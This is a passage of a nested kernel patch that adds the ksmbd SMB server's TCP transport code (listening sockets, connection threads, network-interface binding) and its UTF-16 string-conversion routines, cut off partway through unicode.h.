++static inline void init_smbd_max_io_size(unsigned int sz) { }
++static inline unsigned int get_smbd_max_read_write_size(void) { return 0; }
++#endif
++
++#endif /* __KSMBD_TRANSPORT_RDMA_H__ */
+diff --git a/fs/smb/server/transport_tcp.c b/fs/smb/server/transport_tcp.c
+new file mode 100644
+index 0000000000000..eff7a1d793f00
+--- /dev/null
++++ b/fs/smb/server/transport_tcp.c
+@@ -0,0 +1,649 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#include <linux/freezer.h>
++
++#include "smb_common.h"
++#include "server.h"
++#include "auth.h"
++#include "connection.h"
++#include "transport_tcp.h"
++
++#define IFACE_STATE_DOWN		BIT(0)
++#define IFACE_STATE_CONFIGURED		BIT(1)
++
++static atomic_t active_num_conn;
++
++struct interface {
++	struct task_struct	*ksmbd_kthread;
++	struct socket		*ksmbd_socket;
++	struct list_head	entry;
++	char			*name;
++	struct mutex		sock_release_lock;
++	int			state;
++};
++
++static LIST_HEAD(iface_list);
++
++static int bind_additional_ifaces;
++
++struct tcp_transport {
++	struct ksmbd_transport		transport;
++	struct socket			*sock;
++	struct kvec			*iov;
++	unsigned int			nr_iov;
++};
++
++static struct ksmbd_transport_ops ksmbd_tcp_transport_ops;
++
++static void tcp_stop_kthread(struct task_struct *kthread);
++static struct interface *alloc_iface(char *ifname);
++
++#define KSMBD_TRANS(t)	(&(t)->transport)
++#define TCP_TRANS(t)	((struct tcp_transport *)container_of(t, \
++				struct tcp_transport, transport))
++
++static inline void ksmbd_tcp_nodelay(struct socket *sock)
++{
++	tcp_sock_set_nodelay(sock->sk);
++}
++
++static inline void ksmbd_tcp_reuseaddr(struct socket *sock)
++{
++	sock_set_reuseaddr(sock->sk);
++}
++
++static inline void ksmbd_tcp_rcv_timeout(struct socket *sock, s64 secs)
++{
++	lock_sock(sock->sk);
++	if (secs && secs < MAX_SCHEDULE_TIMEOUT / HZ - 1)
++		sock->sk->sk_rcvtimeo = secs * HZ;
++	else
++		sock->sk->sk_rcvtimeo = MAX_SCHEDULE_TIMEOUT;
++	release_sock(sock->sk);
++}
++
++static inline void ksmbd_tcp_snd_timeout(struct socket *sock, s64 secs)
++{
++	sock_set_sndtimeo(sock->sk, secs);
++}
++
++static struct tcp_transport *alloc_transport(struct socket *client_sk)
++{
++	struct tcp_transport *t;
++	struct ksmbd_conn *conn;
++
++	t = kzalloc(sizeof(*t), GFP_KERNEL);
++	if (!t)
++		return NULL;
++	t->sock = client_sk;
++
++	conn = ksmbd_conn_alloc();
++	if (!conn) {
++		kfree(t);
++		return NULL;
++	}
++
++	conn->transport = KSMBD_TRANS(t);
++	KSMBD_TRANS(t)->conn = conn;
++	KSMBD_TRANS(t)->ops = &ksmbd_tcp_transport_ops;
++	return t;
++}
++
++static void free_transport(struct tcp_transport *t)
++{
++	kernel_sock_shutdown(t->sock, SHUT_RDWR);
++	sock_release(t->sock);
++	t->sock = NULL;
++
++	ksmbd_conn_free(KSMBD_TRANS(t)->conn);
++	kfree(t->iov);
++	kfree(t);
++}
++
++/**
++ * kvec_array_init() - initialize a IO vector segment
++ * @new:	IO vector to be initialized
++ * @iov:	base IO vector
++ * @nr_segs:	number of segments in base iov
++ * @bytes:	total iovec length so far for read
++ *
++ * Return:	Number of IO segments
++ */
++static unsigned int kvec_array_init(struct kvec *new, struct kvec *iov,
++				    unsigned int nr_segs, size_t bytes)
++{
++	size_t base = 0;
++
++	while (bytes || !iov->iov_len) {
++		int copy = min(bytes, iov->iov_len);
++
++		bytes -= copy;
++		base += copy;
++		if (iov->iov_len == base) {
++			iov++;
++			nr_segs--;
++			base = 0;
++		}
++	}
++
++	memcpy(new, iov, sizeof(*iov) * nr_segs);
++	new->iov_base += base;
++	new->iov_len -= base;
++	return nr_segs;
++}
++
++/**
++ * get_conn_iovec() - get connection iovec for reading from socket
++ * @t:		TCP transport instance
++ * @nr_segs:	number of segments in iov
++ *
++ * Return:	return existing or newly allocate iovec
++ */
++static struct kvec *get_conn_iovec(struct tcp_transport *t, unsigned int nr_segs)
++{
++	struct kvec *new_iov;
++
++	if (t->iov && nr_segs <= t->nr_iov)
++		return t->iov;
++
++	/* not big enough -- allocate a new one and release the old */
++	new_iov = kmalloc_array(nr_segs, sizeof(*new_iov), GFP_KERNEL);
++	if (new_iov) {
++		kfree(t->iov);
++		t->iov = new_iov;
++		t->nr_iov = nr_segs;
++	}
++	return new_iov;
++}
++
++static unsigned short ksmbd_tcp_get_port(const struct sockaddr *sa)
++{
++	switch (sa->sa_family) {
++	case AF_INET:
++		return ntohs(((struct sockaddr_in *)sa)->sin_port);
++	case AF_INET6:
++		return ntohs(((struct sockaddr_in6 *)sa)->sin6_port);
++	}
++	return 0;
++}
++
++/**
++ * ksmbd_tcp_new_connection() - create a new tcp session on mount
++ * @client_sk:	socket associated with new connection
++ *
++ * whenever a new connection is requested, create a conn thread
++ * (session thread) to handle new incoming smb requests from the connection
++ *
++ * Return:	0 on success, otherwise error
++ */
++static int ksmbd_tcp_new_connection(struct socket *client_sk)
++{
++	struct sockaddr *csin;
++	int rc = 0;
++	struct tcp_transport *t;
++
++	t = alloc_transport(client_sk);
++	if (!t) {
++		sock_release(client_sk);
++		return -ENOMEM;
++	}
++
++	csin = KSMBD_TCP_PEER_SOCKADDR(KSMBD_TRANS(t)->conn);
++	if (kernel_getpeername(client_sk, csin) < 0) {
++		pr_err("client ip resolution failed\n");
++		rc = -EINVAL;
++		goto out_error;
++	}
++
++	KSMBD_TRANS(t)->handler = kthread_run(ksmbd_conn_handler_loop,
++					      KSMBD_TRANS(t)->conn,
++					      "ksmbd:%u",
++					      ksmbd_tcp_get_port(csin));
++	if (IS_ERR(KSMBD_TRANS(t)->handler)) {
++		pr_err("cannot start conn thread\n");
++		rc = PTR_ERR(KSMBD_TRANS(t)->handler);
++		free_transport(t);
++	}
++	return rc;
++
++out_error:
++	free_transport(t);
++	return rc;
++}
++
++/**
++ * ksmbd_kthread_fn() - listen to new SMB connections and callback server
++ * @p:		arguments to forker thread
++ *
++ * Return:	0 on success, error number otherwise
++ */
++static int ksmbd_kthread_fn(void *p)
++{
++	struct socket *client_sk = NULL;
++	struct interface *iface = (struct interface *)p;
++	int ret;
++
++	while (!kthread_should_stop()) {
++		mutex_lock(&iface->sock_release_lock);
++		if (!iface->ksmbd_socket) {
++			mutex_unlock(&iface->sock_release_lock);
++			break;
++		}
++		ret = kernel_accept(iface->ksmbd_socket, &client_sk,
++				    SOCK_NONBLOCK);
++		mutex_unlock(&iface->sock_release_lock);
++		if (ret) {
++			if (ret == -EAGAIN)
++				/* check for new connections every 100 msecs */
++				schedule_timeout_interruptible(HZ / 10);
++			continue;
++		}
++
++		if (server_conf.max_connections &&
++		    atomic_inc_return(&active_num_conn) >= server_conf.max_connections) {
++			pr_info_ratelimited("Limit the maximum number of connections(%u)\n",
++					    atomic_read(&active_num_conn));
++			atomic_dec(&active_num_conn);
++			sock_release(client_sk);
++			continue;
++		}
++
++		ksmbd_debug(CONN, "connect success: accepted new connection\n");
++		client_sk->sk->sk_rcvtimeo = KSMBD_TCP_RECV_TIMEOUT;
++		client_sk->sk->sk_sndtimeo = KSMBD_TCP_SEND_TIMEOUT;
++
++		ksmbd_tcp_new_connection(client_sk);
++	}
++
++	ksmbd_debug(CONN, "releasing socket\n");
++	return 0;
++}
++
++/**
++ * ksmbd_tcp_run_kthread() - start forker thread
++ * @iface: pointer to struct interface
++ *
++ * start forker thread(ksmbd/0) at module init time to listen
++ * on port 445 for new SMB connection requests. It creates per connection
++ * server threads(ksmbd/x)
++ *
++ * Return:	0 on success or error number
++ */
++static int ksmbd_tcp_run_kthread(struct interface *iface)
++{
++	int rc;
++	struct task_struct *kthread;
++
++	kthread = kthread_run(ksmbd_kthread_fn, (void *)iface, "ksmbd-%s",
++			      iface->name);
++	if (IS_ERR(kthread)) {
++		rc = PTR_ERR(kthread);
++		return rc;
++	}
++	iface->ksmbd_kthread = kthread;
++
++	return 0;
++}
++
++/**
++ * ksmbd_tcp_readv() - read data from socket in given iovec
++ * @t:			TCP transport instance
++ * @iov_orig:		base IO vector
++ * @nr_segs:		number of segments in base iov
++ * @to_read:		number of bytes to read from socket
++ * @max_retries:	maximum retry count
++ *
++ * Return:	on success return number of bytes read from socket,
++ *		otherwise return error number
++ */
++static int ksmbd_tcp_readv(struct tcp_transport *t, struct kvec *iov_orig,
++			   unsigned int nr_segs, unsigned int to_read,
++			   int max_retries)
++{
++	int length = 0;
++	int total_read;
++	unsigned int segs;
++	struct msghdr ksmbd_msg;
++	struct kvec *iov;
++	struct ksmbd_conn *conn = KSMBD_TRANS(t)->conn;
++
++	iov = get_conn_iovec(t, nr_segs);
++	if (!iov)
++		return -ENOMEM;
++
++	ksmbd_msg.msg_control = NULL;
++	ksmbd_msg.msg_controllen = 0;
++
++	for (total_read = 0; to_read; total_read += length, to_read -= length) {
++		try_to_freeze();
++
++		if (!ksmbd_conn_alive(conn)) {
++			total_read = -ESHUTDOWN;
++			break;
++		}
++		segs = kvec_array_init(iov, iov_orig, nr_segs, total_read);
++
++		length = kernel_recvmsg(t->sock, &ksmbd_msg,
++					iov, segs, to_read, 0);
++
++		if (length == -EINTR) {
++			total_read = -ESHUTDOWN;
++			break;
++		} else if (ksmbd_conn_need_reconnect(conn)) {
++			total_read = -EAGAIN;
++			break;
++		} else if (length == -ERESTARTSYS || length == -EAGAIN) {
++			/*
++			 * If max_retries is negative, Allow unlimited
++			 * retries to keep connection with inactive sessions.
++			 */
++			if (max_retries == 0) {
++				total_read = length;
++				break;
++			} else if (max_retries > 0) {
++				max_retries--;
++			}
++
++			usleep_range(1000, 2000);
++			length = 0;
++			continue;
++		} else if (length <= 0) {
++			total_read = length;
++			break;
++		}
++	}
++	return total_read;
++}
++
++/**
++ * ksmbd_tcp_read() - read data from socket in given buffer
++ * @t:		TCP transport instance
++ * @buf:	buffer to store read data from socket
++ * @to_read:	number of bytes to read from socket
++ *
++ * Return:	on success return number of bytes read from socket,
++ *		otherwise return error number
++ */
++static int ksmbd_tcp_read(struct ksmbd_transport *t, char *buf,
++			  unsigned int to_read, int max_retries)
++{
++	struct kvec iov;
++
++	iov.iov_base = buf;
++	iov.iov_len = to_read;
++
++	return ksmbd_tcp_readv(TCP_TRANS(t), &iov, 1, to_read, max_retries);
++}
++
++static int ksmbd_tcp_writev(struct ksmbd_transport *t, struct kvec *iov,
++			    int nvecs, int size, bool need_invalidate,
++			    unsigned int remote_key)
++
++{
++	struct msghdr smb_msg = {.msg_flags = MSG_NOSIGNAL};
++
++	return kernel_sendmsg(TCP_TRANS(t)->sock, &smb_msg, iov, nvecs, size);
++}
++
++static void ksmbd_tcp_disconnect(struct ksmbd_transport *t)
++{
++	free_transport(TCP_TRANS(t));
++	if (server_conf.max_connections)
++		atomic_dec(&active_num_conn);
++}
++
++static void tcp_destroy_socket(struct socket *ksmbd_socket)
++{
++	int ret;
++
++	if (!ksmbd_socket)
++		return;
++
++	/* set zero to timeout */
++	ksmbd_tcp_rcv_timeout(ksmbd_socket, 0);
++	ksmbd_tcp_snd_timeout(ksmbd_socket, 0);
++
++	ret = kernel_sock_shutdown(ksmbd_socket, SHUT_RDWR);
++	if (ret)
++		pr_err("Failed to shutdown socket: %d\n", ret);
++	sock_release(ksmbd_socket);
++}
++
++/**
++ * create_socket - create socket for ksmbd/0
++ *
++ * Return:	0 on success, error number otherwise
++ */
++static int create_socket(struct interface *iface)
++{
++	int ret;
++	struct sockaddr_in6 sin6;
++	struct sockaddr_in sin;
++	struct socket *ksmbd_socket;
++	bool ipv4 = false;
++
++	ret = sock_create(PF_INET6, SOCK_STREAM, IPPROTO_TCP, &ksmbd_socket);
++	if (ret) {
++		if (ret != -EAFNOSUPPORT)
++			pr_err("Can't create socket for ipv6, fallback to ipv4: %d\n", ret);
++		ret = sock_create(PF_INET, SOCK_STREAM, IPPROTO_TCP,
++				  &ksmbd_socket);
++		if (ret) {
++			pr_err("Can't create socket for ipv4: %d\n", ret);
++			goto out_clear;
++		}
++
++		sin.sin_family = PF_INET;
++		sin.sin_addr.s_addr = htonl(INADDR_ANY);
++		sin.sin_port = htons(server_conf.tcp_port);
++		ipv4 = true;
++	} else {
++		sin6.sin6_family = PF_INET6;
++		sin6.sin6_addr = in6addr_any;
++		sin6.sin6_port = htons(server_conf.tcp_port);
++	}
++
++	ksmbd_tcp_nodelay(ksmbd_socket);
++	ksmbd_tcp_reuseaddr(ksmbd_socket);
++
++	ret = sock_setsockopt(ksmbd_socket,
++			      SOL_SOCKET,
++			      SO_BINDTODEVICE,
++			      KERNEL_SOCKPTR(iface->name),
++			      strlen(iface->name));
++	if (ret != -ENODEV && ret < 0) {
++		pr_err("Failed to set SO_BINDTODEVICE: %d\n", ret);
++		goto out_error;
++	}
++
++	if (ipv4)
++		ret = kernel_bind(ksmbd_socket, (struct sockaddr *)&sin,
++				  sizeof(sin));
++	else
++		ret = kernel_bind(ksmbd_socket, (struct sockaddr *)&sin6,
++				  sizeof(sin6));
++	if (ret) {
++		pr_err("Failed to bind socket: %d\n", ret);
++		goto out_error;
++	}
++
++	ksmbd_socket->sk->sk_rcvtimeo = KSMBD_TCP_RECV_TIMEOUT;
++	ksmbd_socket->sk->sk_sndtimeo = KSMBD_TCP_SEND_TIMEOUT;
++
++	ret = kernel_listen(ksmbd_socket, KSMBD_SOCKET_BACKLOG);
++	if (ret) {
++		pr_err("Port listen() error: %d\n", ret);
++		goto out_error;
++	}
++
++	iface->ksmbd_socket = ksmbd_socket;
++	ret = ksmbd_tcp_run_kthread(iface);
++	if (ret) {
++		pr_err("Can't start ksmbd main kthread: %d\n", ret);
++		goto out_error;
++	}
++	iface->state = IFACE_STATE_CONFIGURED;
++
++	return 0;
++
++out_error:
++	tcp_destroy_socket(ksmbd_socket);
++out_clear:
++	iface->ksmbd_socket = NULL;
++	return ret;
++}
++
++static int ksmbd_netdev_event(struct notifier_block *nb, unsigned long event,
++			      void *ptr)
++{
++	struct net_device *netdev = netdev_notifier_info_to_dev(ptr);
++	struct interface *iface;
++	int ret, found = 0;
++
++	switch (event) {
++	case NETDEV_UP:
++		if (netif_is_bridge_port(netdev))
++			return NOTIFY_OK;
++
++		list_for_each_entry(iface, &iface_list, entry) {
++			if (!strcmp(iface->name, netdev->name)) {
++				found = 1;
++				if (iface->state != IFACE_STATE_DOWN)
++					break;
++				ret = create_socket(iface);
++				if (ret)
++					return NOTIFY_OK;
++				break;
++			}
++		}
++		if (!found && bind_additional_ifaces) {
++			iface = alloc_iface(kstrdup(netdev->name, GFP_KERNEL));
++			if (!iface)
++				return NOTIFY_OK;
++			ret = create_socket(iface);
++			if (ret)
++				break;
++		}
++		break;
++	case NETDEV_DOWN:
++		list_for_each_entry(iface, &iface_list, entry) {
++			if (!strcmp(iface->name, netdev->name) &&
++			    iface->state == IFACE_STATE_CONFIGURED) {
++				tcp_stop_kthread(iface->ksmbd_kthread);
++				iface->ksmbd_kthread = NULL;
++				mutex_lock(&iface->sock_release_lock);
++				tcp_destroy_socket(iface->ksmbd_socket);
++				iface->ksmbd_socket = NULL;
++				mutex_unlock(&iface->sock_release_lock);
++
++				iface->state = IFACE_STATE_DOWN;
++				break;
++			}
++		}
++		break;
++	}
++
++	return NOTIFY_DONE;
++}
++
++static struct notifier_block ksmbd_netdev_notifier = {
++	.notifier_call = ksmbd_netdev_event,
++};
++
++int ksmbd_tcp_init(void)
++{
++	register_netdevice_notifier(&ksmbd_netdev_notifier);
++
++	return 0;
++}
++
++static void tcp_stop_kthread(struct task_struct *kthread)
++{
++	int ret;
++
++	if (!kthread)
++		return;
++
++	ret = kthread_stop(kthread);
++	if (ret)
++		pr_err("failed to stop forker thread\n");
++}
++
++void ksmbd_tcp_destroy(void)
++{
++	struct interface *iface, *tmp;
++
++	unregister_netdevice_notifier(&ksmbd_netdev_notifier);
++
++	list_for_each_entry_safe(iface, tmp, &iface_list, entry) {
++		list_del(&iface->entry);
++		kfree(iface->name);
++		kfree(iface);
++	}
++}
++
++static struct interface *alloc_iface(char *ifname)
++{
++	struct interface *iface;
++
++	if (!ifname)
++		return NULL;
++
++	iface = kzalloc(sizeof(struct interface), GFP_KERNEL);
++	if (!iface) {
++		kfree(ifname);
++		return NULL;
++	}
++
++	iface->name = ifname;
++	iface->state = IFACE_STATE_DOWN;
++	list_add(&iface->entry, &iface_list);
++	mutex_init(&iface->sock_release_lock);
++	return iface;
++}
++
++int ksmbd_tcp_set_interfaces(char *ifc_list, int ifc_list_sz)
++{
++	int sz = 0;
++
++	if (!ifc_list_sz) {
++		struct net_device *netdev;
++
++		rtnl_lock();
++		for_each_netdev(&init_net, netdev) {
++			if (netif_is_bridge_port(netdev))
++				continue;
++			if (!alloc_iface(kstrdup(netdev->name, GFP_KERNEL)))
++				return -ENOMEM;
++		}
++		rtnl_unlock();
++		bind_additional_ifaces = 1;
++		return 0;
++	}
++
++	while (ifc_list_sz > 0) {
++		if (!alloc_iface(kstrdup(ifc_list, GFP_KERNEL)))
++			return -ENOMEM;
++
++		sz = strlen(ifc_list);
++		if (!sz)
++			break;
++
++		ifc_list += sz + 1;
++		ifc_list_sz -= (sz + 1);
++	}
++
++	bind_additional_ifaces = 0;
++
++	return 0;
++}
++
++static struct ksmbd_transport_ops ksmbd_tcp_transport_ops = {
++	.read		= ksmbd_tcp_read,
++	.writev		= ksmbd_tcp_writev,
++	.disconnect	= ksmbd_tcp_disconnect,
++};
+diff --git a/fs/smb/server/transport_tcp.h b/fs/smb/server/transport_tcp.h
+new file mode 100644
+index 0000000000000..e338bebe322f1
+--- /dev/null
++++ b/fs/smb/server/transport_tcp.h
+@@ -0,0 +1,13 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __KSMBD_TRANSPORT_TCP_H__
++#define __KSMBD_TRANSPORT_TCP_H__
++
++int ksmbd_tcp_set_interfaces(char *ifc_list, int ifc_list_sz);
++int ksmbd_tcp_init(void);
++void ksmbd_tcp_destroy(void);
++
++#endif /* __KSMBD_TRANSPORT_TCP_H__ */
+diff --git a/fs/smb/server/unicode.c b/fs/smb/server/unicode.c
+new file mode 100644
+index 0000000000000..a0db699ddafda
+--- /dev/null
++++ b/fs/smb/server/unicode.c
+@@ -0,0 +1,384 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Some of the source code in this file came from fs/cifs/cifs_unicode.c
++ *
++ *   Copyright (c) International Business Machines  Corp., 2000,2009
++ *   Modified by Steve French (sfrench@us.ibm.com)
++ *   Modified by Namjae Jeon (linkinjeon@kernel.org)
++ */
++#include <linux/fs.h>
++#include <linux/slab.h>
++#include <asm/unaligned.h>
++#include "glob.h"
++#include "unicode.h"
++#include "uniupr.h"
++#include "smb_common.h"
++
++/*
++ * smb_utf16_bytes() - how long will a string be after conversion?
++ * @from:	pointer to input string
++ * @maxbytes:	don't go past this many bytes of input string
++ * @codepage:	destination codepage
++ *
++ * Walk a utf16le string and return the number of bytes that the string will
++ * be after being converted to the given charset, not including any null
++ * termination required. Don't walk past maxbytes in the source buffer.
++ *
++ * Return:	string length after conversion
++ */
++static int smb_utf16_bytes(const __le16 *from, int maxbytes,
++			   const struct nls_table *codepage)
++{
++	int i;
++	int charlen, outlen = 0;
++	int maxwords = maxbytes / 2;
++	char tmp[NLS_MAX_CHARSET_SIZE];
++	__u16 ftmp;
++
++	for (i = 0; i < maxwords; i++) {
++		ftmp = get_unaligned_le16(&from[i]);
++		if (ftmp == 0)
++			break;
++
++		charlen = codepage->uni2char(ftmp, tmp, NLS_MAX_CHARSET_SIZE);
++		if (charlen > 0)
++			outlen += charlen;
++		else
++			outlen++;
++	}
++
++	return outlen;
++}
++
++/*
++ * cifs_mapchar() - convert a host-endian char to proper char in codepage
++ * @target:	where converted character should be copied
++ * @src_char:	2 byte host-endian source character
++ * @cp:		codepage to which character should be converted
++ * @mapchar:	should character be mapped according to mapchars mount option?
++ *
++ * This function handles the conversion of a single character. It is the
++ * responsibility of the caller to ensure that the target buffer is large
++ * enough to hold the result of the conversion (at least NLS_MAX_CHARSET_SIZE).
++ *
++ * Return:	string length after conversion
++ */
++static int
++cifs_mapchar(char *target, const __u16 src_char, const struct nls_table *cp,
++	     bool mapchar)
++{
++	int len = 1;
++
++	if (!mapchar)
++		goto cp_convert;
++
++	/*
++	 * BB: Cannot handle remapping UNI_SLASH until all the calls to
++	 *     build_path_from_dentry are modified, as they use slash as
++	 *     separator.
++	 */
++	switch (src_char) {
++	case UNI_COLON:
++		*target = ':';
++		break;
++	case UNI_ASTERISK:
++		*target = '*';
++		break;
++	case UNI_QUESTION:
++		*target = '?';
++		break;
++	case UNI_PIPE:
++		*target = '|';
++		break;
++	case UNI_GRTRTHAN:
++		*target = '>';
++		break;
++	case UNI_LESSTHAN:
++		*target = '<';
++		break;
++	default:
++		goto cp_convert;
++	}
++
++out:
++	return len;
++
++cp_convert:
++	len = cp->uni2char(src_char, target, NLS_MAX_CHARSET_SIZE);
++	if (len <= 0) {
++		*target = '?';
++		len = 1;
++	}
++
++	goto out;
++}
++
++/*
++ * is_char_allowed() - check for valid character
++ * @ch:		input character to be checked
++ *
++ * Return:	1 if char is allowed, otherwise 0
++ */
++static inline int is_char_allowed(char *ch)
++{
++	/* check for control chars, wildcards etc. */
++	if (!(*ch & 0x80) &&
++	    (*ch <= 0x1f ||
++	     *ch == '?' || *ch == '"' || *ch == '<' ||
++	     *ch == '>' || *ch == '|'))
++		return 0;
++
++	return 1;
++}
++
++/*
++ * smb_from_utf16() - convert utf16le string to local charset
++ * @to:		destination buffer
++ * @from:	source buffer
++ * @tolen:	destination buffer size (in bytes)
++ * @fromlen:	source buffer size (in bytes)
++ * @codepage:	codepage to which characters should be converted
++ * @mapchar:	should characters be remapped according to the mapchars option?
++ *
++ * Convert a little-endian utf16le string (as sent by the server) to a string
++ * in the provided codepage. The tolen and fromlen parameters are to ensure
++ * that the code doesn't walk off of the end of the buffer (which is always
++ * a danger if the alignment of the source buffer is off). The destination
++ * string is always properly null terminated and fits in the destination
++ * buffer. Returns the length of the destination string in bytes (including
++ * null terminator).
++ *
++ * Note that some windows versions actually send multiword UTF-16 characters
++ * instead of straight UTF16-2. The linux nls routines however aren't able to
++ * deal with those characters properly. In the event that we get some of
++ * those characters, they won't be translated properly.
++ *
++ * Return:	string length after conversion
++ */
++static int smb_from_utf16(char *to, const __le16 *from, int tolen, int fromlen,
++			  const struct nls_table *codepage, bool mapchar)
++{
++	int i, charlen, safelen;
++	int outlen = 0;
++	int nullsize = nls_nullsize(codepage);
++	int fromwords = fromlen / 2;
++	char tmp[NLS_MAX_CHARSET_SIZE];
++	__u16 ftmp;
++
++	/*
++	 * because the chars can be of varying widths, we need to take care
++	 * not to overflow the destination buffer when we get close to the
++	 * end of it. Until we get to this offset, we don't need to check
++	 * for overflow however.
++	 */
++	safelen = tolen - (NLS_MAX_CHARSET_SIZE + nullsize);
++
++	for (i = 0; i < fromwords; i++) {
++		ftmp = get_unaligned_le16(&from[i]);
++		if (ftmp == 0)
++			break;
++
++		/*
++		 * check to see if converting this character might make the
++		 * conversion bleed into the null terminator
++		 */
++		if (outlen >= safelen) {
++			charlen = cifs_mapchar(tmp, ftmp, codepage, mapchar);
++			if ((outlen + charlen) > (tolen - nullsize))
++				break;
++		}
++
++		/* put converted char into 'to' buffer */
++		charlen = cifs_mapchar(&to[outlen], ftmp, codepage, mapchar);
++		outlen += charlen;
++	}
++
++	/* properly null-terminate string */
++	for (i = 0; i < nullsize; i++)
++		to[outlen++] = 0;
++
++	return outlen;
++}
++
++/*
++ * smb_strtoUTF16() - Convert character string to unicode string
++ * @to:		destination buffer
++ * @from:	source buffer
++ * @len:	destination buffer size (in bytes)
++ * @codepage:	codepage to which characters should be converted
++ *
++ * Return:	string length after conversion
++ */
++int smb_strtoUTF16(__le16 *to, const char *from, int len,
++		   const struct nls_table *codepage)
++{
++	int charlen;
++	int i;
++	wchar_t wchar_to; /* needed to quiet sparse */
++
++	/* special case for utf8 to handle no plane0 chars */
++	if (!strcmp(codepage->charset, "utf8")) {
++		/*
++		 * convert utf8 -> utf16, we assume we have enough space
++		 * as caller should have assumed conversion does not overflow
++		 * in destination len is length in wchar_t units (16bits)
++		 */
++		i  = utf8s_to_utf16s(from, len, UTF16_LITTLE_ENDIAN,
++				     (wchar_t *)to, len);
++
++		/* if success terminate and exit */
++		if (i >= 0)
++			goto success;
++		/*
++		 * if fails fall back to UCS encoding as this
++		 * function should not return negative values
++		 * currently can fail only if source contains
++		 * invalid encoded characters
++		 */
++	}
++
++	for (i = 0; len > 0 && *from; i++, from += charlen, len -= charlen) {
++		charlen = codepage->char2uni(from, len, &wchar_to);
++		if (charlen < 1) {
++			/* A question mark */
++			wchar_to = 0x003f;
++			charlen = 1;
++		}
++		put_unaligned_le16(wchar_to, &to[i]);
++	}
++
++success:
++	put_unaligned_le16(0, &to[i]);
++	return i;
++}
++
++/*
++ * smb_strndup_from_utf16() - copy a string from wire format to the local
++ *		codepage
++ * @src:	source string
++ * @maxlen:	don't walk past this many bytes in the source string
++ * @is_unicode:	is this a unicode string?
++ * @codepage:	destination codepage
++ *
++ * Take a string given by the server, convert it to the local codepage and
++ * put it in a new buffer. Returns a pointer to the new string or NULL on
++ * error.
++ *
++ * Return:	destination string buffer or error ptr
++ */
++char *smb_strndup_from_utf16(const char *src, const int maxlen,
++			     const bool is_unicode,
++			     const struct nls_table *codepage)
++{
++	int len, ret;
++	char *dst;
++
++	if (is_unicode) {
++		len = smb_utf16_bytes((__le16 *)src, maxlen, codepage);
++		len += nls_nullsize(codepage);
++		dst = kmalloc(len, GFP_KERNEL);
++		if (!dst)
++			return ERR_PTR(-ENOMEM);
++		ret = smb_from_utf16(dst, (__le16 *)src, len, maxlen, codepage,
++				     false);
++		if (ret < 0) {
++			kfree(dst);
++			return ERR_PTR(-EINVAL);
++		}
++	} else {
++		len = strnlen(src, maxlen);
++		len++;
++		dst = kmalloc(len, GFP_KERNEL);
++		if (!dst)
++			return ERR_PTR(-ENOMEM);
++		strscpy(dst, src, len);
++	}
++
++	return dst;
++}
++
++/*
++ * Convert 16 bit Unicode pathname to wire format from string in current code
++ * page. Conversion may involve remapping up the six characters that are
++ * only legal in POSIX-like OS (if they are present in the string). Path
++ * names are little endian 16 bit Unicode on the wire
++ */
++/*
++ * smbConvertToUTF16() - convert string from local charset to utf16
++ * @target:	destination buffer
++ * @source:	source buffer
++ * @srclen:	source buffer size (in bytes)
++ * @cp:		codepage to which characters should be converted
++ * @mapchar:	should characters be remapped according to the mapchars option?
++ *
++ * Convert 16 bit Unicode pathname to wire format from string in current code
++ * page. Conversion may involve remapping up the six characters that are
++ * only legal in POSIX-like OS (if they are present in the string). Path
++ * names are little endian 16 bit Unicode on the wire
++ *
++ * Return:	char length after conversion
++ */
++int smbConvertToUTF16(__le16 *target, const char *source, int srclen,
++		      const struct nls_table *cp, int mapchars)
++{
++	int i, j, charlen;
++	char src_char;
++	__le16 dst_char;
++	wchar_t tmp;
++
++	if (!mapchars)
++		return smb_strtoUTF16(target, source, srclen, cp);
++
++	for (i = 0, j = 0; i < srclen; j++) {
++		src_char = source[i];
++		charlen = 1;
++		switch (src_char) {
++		case 0:
++			put_unaligned(0, &target[j]);
++			return j;
++		case ':':
++			dst_char = cpu_to_le16(UNI_COLON);
++			break;
++		case '*':
++			dst_char = cpu_to_le16(UNI_ASTERISK);
++			break;
++		case '?':
++			dst_char = cpu_to_le16(UNI_QUESTION);
++			break;
++		case '<':
++			dst_char = cpu_to_le16(UNI_LESSTHAN);
++			break;
++		case '>':
++			dst_char = cpu_to_le16(UNI_GRTRTHAN);
++			break;
++		case '|':
++			dst_char = cpu_to_le16(UNI_PIPE);
++			break;
++		/*
++		 * FIXME: We can not handle remapping backslash (UNI_SLASH)
++		 * until all the calls to build_path_from_dentry are modified,
++		 * as they use backslash as separator.
++		 */
++		default:
++			charlen = cp->char2uni(source + i, srclen - i, &tmp);
++			dst_char = cpu_to_le16(tmp);
++
++			/*
++			 * if no match, use question mark, which at least in
++			 * some cases serves as wild card
++			 */
++			if (charlen < 1) {
++				dst_char = cpu_to_le16(0x003f);
++				charlen = 1;
++			}
++		}
++		/*
++		 * character may take more than one byte in the source string,
++		 * but will take exactly two bytes in the target string
++		 */
++		i += charlen;
++		put_unaligned(dst_char, &target[j]);
++	}
++
++	return j;
++}
+diff --git a/fs/smb/server/unicode.h b/fs/smb/server/unicode.h
+new file mode 100644
+index 0000000000000..076f6034a7899
+--- /dev/null
++++ b/fs/smb/server/unicode.h
+@@ -0,0 +1,358 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ * Some of the source code in this file came from fs/cifs/cifs_unicode.c
++ * cifs_unicode:  Unicode kernel case support
++ *
++ * Function:
++ *     Convert a unicode character to upper or lower case using
++ *     compressed tables.
++ *
++ *   Copyright (c) International Business Machines  Corp., 2000,2009
++ *
++ *
++ * Notes:
++ *     These APIs are based on the C library functions.  The semantics
++ *     should match the C functions but with expanded size operands.
++ *
++ *     The upper/lower functions are based on a table created by mkupr.
++ *     This is a compressed table of upper and lower case conversion.
++ *
++ */
++#ifndef _CIFS_UNICODE_H
++#define _CIFS_UNICODE_H
++
++#include <asm/byteorder.h>
++#include <linux/types.h>
++#include <linux/nls.h>
++#include <linux/unicode.h>
++
++#define  UNIUPR_NOLOWER		/* Example to not expand lower case tables */
++
++/*
++ * Windows maps these to the user defined 16 bit Unicode range since they are
